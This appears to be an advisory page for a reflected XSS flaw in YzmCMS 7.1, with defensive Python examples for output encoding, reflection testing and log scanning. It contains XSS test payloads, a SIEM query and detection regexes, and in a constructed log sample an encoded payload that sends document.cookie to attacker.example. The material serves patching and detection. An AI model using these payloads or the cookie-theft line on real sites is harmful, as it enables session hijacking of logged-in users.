CVE-2024-35110

5.5 MEDIUM

📋 TL;DR

A reflected cross-site scripting (XSS) vulnerability in YzmCMS 7.1 lets an attacker run JavaScript in the browser of a logged-in user who opens a crafted link. The injected script executes inside the victim's session, so it can read and exfiltrate session cookies (unless they are HttpOnly) or perform actions in the CMS as that user. All YzmCMS 7.1 installations with default configurations are affected.

💻 Affected Systems

Products:
  • YzmCMS
Versions: 7.1
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: The attacker needs no account; the impact lands on logged-in users (including administrators) who open an attacker-supplied link.


⚠️ Risk & Real-World Impact

🔴 Worst Case

Attackers steal administrator session cookies, gain full administrative access to the CMS, and potentially compromise the entire web application and underlying server.

🟠 Likely Case

Attackers steal user session cookies to hijack accounts, perform unauthorized actions, and access sensitive user data within the CMS.

🟢 If Mitigated

With proper output encoding, the payload is rendered as text and no JavaScript runs, so there is nothing to steal. Marking the session cookie HttpOnly additionally keeps document.cookie from reading it, but an XSS payload can still drive the victim's session (session riding), so HttpOnly limits the blast radius rather than closing the bug.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires social engineering: the attacker needs no credentials, but a user who is logged in to the CMS must open the crafted link (email, chat, a link on another site) for the payload to run in their session.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 7.2 or later

Vendor Advisory: https://github.com/yzmcms/yzmcms/issues/68

Restart Required: No

Instructions:

1. Back up the current installation (files and database).
2. Download YzmCMS 7.2 or later from the official repository.
3. Upgrade in place. If you only replace the vulnerable file yzmphp/core/class/application.class.php with the patched version, be aware that a single file lifted from a newer release may depend on other changes in that release; a full upgrade is the safer route.
4. Verify the fix by requesting the affected page with an XSS payload and confirming the payload comes back HTML-encoded in the response.

🔧 Temporary Workarounds

Input Validation Filter


Encode the reflected parameter at output time rather than trying to sanitise it on input.

Modify application.class.php so the value is passed through htmlspecialchars() with ENT_QUOTES (and the site's charset) before it is written into the response; before PHP 8.1 the default flags leave single quotes unescaped, which still allows attribute breakouts. Blocklist filters that only strip <script are not a fix: an <img> tag with an onerror= handler, or a quote that closes an attribute, carries no <script at all.
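The difference between a blocklist filter and context-correct output encoding, as an added example that is not YzmCMS code and not the vendor's patch. It is written in Python, with html.escape(quote=True) standing in for PHP's htmlspecialchars() with ENT_QUOTES; the template, parameter name and payloads are constructed for the demo, and a real HTML parser rather than a substring search decides whether anything executable survives.

```python
"""Added example: why output encoding beats a blocklist filter for reflected XSS.

Python stand-in for the PHP fix discussed above; html.escape(quote=True)
produces the same escaping as htmlspecialchars($s, ENT_QUOTES). The template
and payloads are constructed for the demo and are not YzmCMS code.
"""
import html
from html.parser import HTMLParser

# Constructed payloads, one per reflection context a filter has to survive:
# a plain tag, an event handler with no "<script" in it, and an attribute
# breakout that needs no angle brackets at all.
PAYLOADS = {
    "script_tag": "<script>alert(1)</script>",
    "event_handler": "<img src=x onerror=alert(1)>",
    "attr_breakout": '" autofocus onfocus=alert(1) x="',
}


def naive_filter(value: str) -> str:
    """Blocklist 'sanitizer' that only strips script tags. Weak by design."""
    return value.replace("<script", "").replace("</script", "")


def encode_for_html(value: str) -> str:
    """Context-correct encoding for HTML text and double-quoted attributes.
    Escapes & < > " and ' (quote=True), like htmlspecialchars() + ENT_QUOTES."""
    return html.escape(value, quote=True)


def render_page(param: str, encoder) -> str:
    """Hypothetical template that reflects the parameter in two contexts:
    body text and a double-quoted attribute value."""
    out = encoder(param)
    return f'<p>You searched for: {out}</p>\n<input name="q" value="{out}">'


class _ScriptProbe(HTMLParser):
    """Records <script> tags and on* event-handler attributes the browser
    would actually execute, instead of grepping for substrings."""

    def __init__(self) -> None:
        super().__init__()
        self.hits: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.hits.append("script")
        for name, _ in attrs:
            if name.startswith("on"):
                self.hits.append(f"{tag}@{name}")


def executable_constructs(page: str) -> list[str]:
    """Parse the rendered page and list the constructs that would run script."""
    probe = _ScriptProbe()
    probe.feed(page)
    probe.close()
    return probe.hits


def compare() -> dict[str, dict[str, list[str]]]:
    """Run every payload through both approaches; an empty list means neutralised."""
    return {
        name: {
            "naive_filter": executable_constructs(render_page(p, naive_filter)),
            "encode_for_html": executable_constructs(render_page(p, encode_for_html)),
        }
        for name, p in PAYLOADS.items()
    }


if __name__ == "__main__":
    for name, result in compare().items():
        print(f"{name:14} filter={result['naive_filter']}  encode={result['encode_for_html']}")
```

The blocklist stops only the textbook <script> payload; the onerror= and attribute-breakout payloads pass straight through it, while the encoded output yields no executable construct for any of the three.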

Content Security Policy


Add a CSP header so the browser refuses script the attacker injects into the page.

Add header: Content-Security-Policy: script-src 'self'

Caveat: script-src 'self' blocks all inline <script> blocks and inline event handlers, including any that the CMS's own pages rely on, so roll it out first as Content-Security-Policy-Report-Only and review the violation reports before enforcing. It is a backstop that limits what an injected payload can do, not a replacement for the encoding fix.

🧯 If You Can't Patch

  • Implement web application firewall (WAF) rules to block XSS payloads in URLs, including their percent-encoded and double-encoded forms
  • Set the session cookie with the HttpOnly and SameSite attributes so document.cookie cannot read it; this blocks the cookie-theft scenario but not actions a payload performs inside the victim's session
  • Educate users about phishing risks and implement session timeout policies

🔍 How to Verify

Check if Vulnerable:

While logged in, request the affected page with an XSS payload in the parameter, e.g. /path?param=<script>alert(1)</script> (percent-encoded as sent), and view the response source. If the <script> tag comes back unencoded, the installation is vulnerable. Check the raw HTML rather than relying on a popup: an existing CSP header can suppress the alert on a page that is still vulnerable.

Check Version:

Check YzmCMS version in admin panel or read version.txt file

Verify Fix Applied:

After patching, repeat the same request: the payload must appear in the response as &lt;script&gt;alert(1)&lt;/script&gt;, with quotes encoded as &quot; / &#039;, and no script executes.
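A small reflection check that tells the three states apart (raw, brackets encoded but quotes not, fully encoded), added here as an example rather than a tool from the YzmCMS project. It sends a unique canary instead of alert(1) so a cached page cannot produce a false positive; the base URL, parameter name and cookie are whatever the tester supplies, and the response bodies in demo() are constructed.

```python
"""Added example: test whether a query parameter is reflected raw, encoded, or not at all.

Not YzmCMS code. The URL, parameter name and cookie are supplied by the tester;
the response bodies in demo() are constructed.
"""
import secrets
import urllib.parse
import urllib.request


def make_canary() -> str:
    """Unique marker wrapped in the two characters that decide exploitability:
    an angle bracket (tag injection) and a double quote (attribute breakout).
    Unique per run so a cached or stale page cannot produce a false positive."""
    return f'<x{secrets.token_hex(4)}"a>'


def classify_reflection(body: str, canary: str) -> str:
    """Distinguish the cases a tester needs to tell apart.

    reflected-raw        -> '<' survived: tag/script injection possible
    reflected-quotes-raw -> '<' encoded but '"' not: attribute breakout possible
                            (what htmlspecialchars() without ENT_QUOTES gives you)
    reflected-encoded    -> both encoded, the expected state after the fix
    not-reflected        -> parameter does not appear in this response
    """
    token = canary[2:-3]  # the hex part between '<x' and '"a>'
    if token not in body:
        return "not-reflected"
    if f"<x{token}" in body:
        return "reflected-raw"
    if f'x{token}"' in body:
        return "reflected-quotes-raw"
    return "reflected-encoded"


def check_url(base_url: str, param: str, cookie: str = "", timeout: int = 10) -> str:
    """Send one GET with the canary in `param` and classify the response.
    Pass the session cookie of a test account, since the page notes the
    affected path is reached by logged-in users."""
    canary = make_canary()
    sep = "&" if "?" in base_url else "?"
    url = base_url + sep + urllib.parse.urlencode({param: canary})
    req = urllib.request.Request(url, headers={"User-Agent": "reflection-check"})
    if cookie:
        req.add_header("Cookie", cookie)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        charset = resp.headers.get_content_charset() or "utf-8"
        body = resp.read().decode(charset, errors="replace")
    return classify_reflection(body, canary)


def demo() -> dict:
    """Offline run over constructed responses, one per verdict."""
    canary = '<x0123abcd"a>'
    responses = {
        "unpatched": f"<p>Search: {canary}</p>",
        "half_fixed": '<p>Search: &lt;x0123abcd"a&gt;</p>',
        "patched": "<p>Search: &lt;x0123abcd&quot;a&gt;</p>",
        "other_page": "<p>Nothing here</p>",
    }
    return {name: classify_reflection(body, canary) for name, body in responses.items()}


if __name__ == "__main__":
    import sys
    if len(sys.argv) >= 3:  # usage: check.py https://host/path param [cookie]
        print(check_url(sys.argv[1], sys.argv[2], sys.argv[3] if len(sys.argv) > 3 else ""))
    else:
        print(demo())
```

Only reflected-encoded counts as fixed; reflected-quotes-raw is the state a partial patch leaves behind and is still exploitable inside attribute values.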

📡 Detection & Monitoring

Log Indicators:

  • Unusually long URLs in access logs with script tags, javascript: URIs or on*= handlers in the query string, usually percent-encoded (%3Cscript)
  • An existing session ID used from a new IP address or User-Agent with no login event for it, the signature of a replayed stolen cookie

Network Indicators:

  • HTTP requests containing <script> tags in query parameters
  • Outbound connections to suspicious domains after user visits crafted URLs

SIEM Query:

source="web_access.log" AND ("<script" OR "%3Cscript" OR "javascript:" OR "javascript%3A" OR "onerror=" OR "onerror%3D" OR "onload=" OR "onload%3D")

Access logs record the request URL as sent, i.e. percent-encoded, so matching only the literal "<script" misses most real probes; decode the query string in the SIEM where it supports that, and otherwise include the encoded variants as above. Double-encoded payloads (%253Cscript) need a second decode round.
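The same indicators applied after percent-decoding, as an added example and not a query from the page or a YzmCMS component: a scanner over combined-format access logs that decodes the query string until it stops changing (so double-encoded probes are caught) and reports which indicator fired. The log lines, IPs, paths and parameter names are constructed, not real YzmCMS endpoints, and the on*= pattern is a generalisation of the onerror=/onload= entries above.

```python
"""Added example: find XSS probes in web access logs after URL-decoding.

Not YzmCMS code. The log lines are constructed in Apache/nginx combined
format; the paths and parameter names are placeholders, not real endpoints.
"""
import re
import urllib.parse

# Constructed sample: two probes from one client (the second double-encoded),
# a benign request that merely contains the word "javascript", and an unrelated hit.
LOG_SAMPLE = """\
203.0.113.7 - - [12/May/2024:10:01:02 +0000] "GET /index.php?m=search&q=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fattacker.example%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [12/May/2024:10:01:40 +0000] "GET /index.php?m=search&q=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [12/May/2024:10:02:11 +0000] "GET /index.php?m=search&q=javascript HTTP/1.1" 200 5100 "-" "Mozilla/5.0"
198.51.100.9 - - [12/May/2024:10:03:00 +0000] "GET /admin.php HTTP/1.1" 200 8800 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# The page's indicators, plus a generic on*= handler and the cookie read itself.
INDICATORS = {
    "script_tag": re.compile(r"<script", re.I),
    "javascript_uri": re.compile(r"javascript:", re.I),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.I),
    "cookie_access": re.compile(r"document\.cookie", re.I),
}


def deep_unquote(s: str, max_rounds: int = 3):
    """Percent-decode until stable so %253Cscript (double-encoded) is caught.
    Plain unquote() is used so a literal '+' is not turned into a space on
    later rounds. Returns the decoded string and how many rounds changed it."""
    rounds = 0
    for _ in range(max_rounds):
        nxt = urllib.parse.unquote(s)
        if nxt == s:
            break
        s, rounds = nxt, rounds + 1
    return s, rounds


def scan_log(text: str) -> list:
    """Return one record per request whose decoded query string matches an indicator."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or "?" not in m["target"]:
            continue
        path, query = m["target"].split("?", 1)
        decoded, rounds = deep_unquote(query)
        matched = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
        if matched:
            hits.append({
                "ip": m["ip"],
                "timestamp": m["ts"],
                "path": path,
                "decoded_query": decoded,
                "decode_rounds": rounds,
                "indicators": matched,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(LOG_SAMPLE):
        print(f"{hit['ip']} {hit['timestamp']} rounds={hit['decode_rounds']} "
              f"{hit['indicators']} {hit['path']}?{hit['decoded_query']}")
```

A literal-only search would have missed both probes in the sample; the second is only visible after two decode rounds, and the benign "javascript" request without a colon is correctly ignored.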
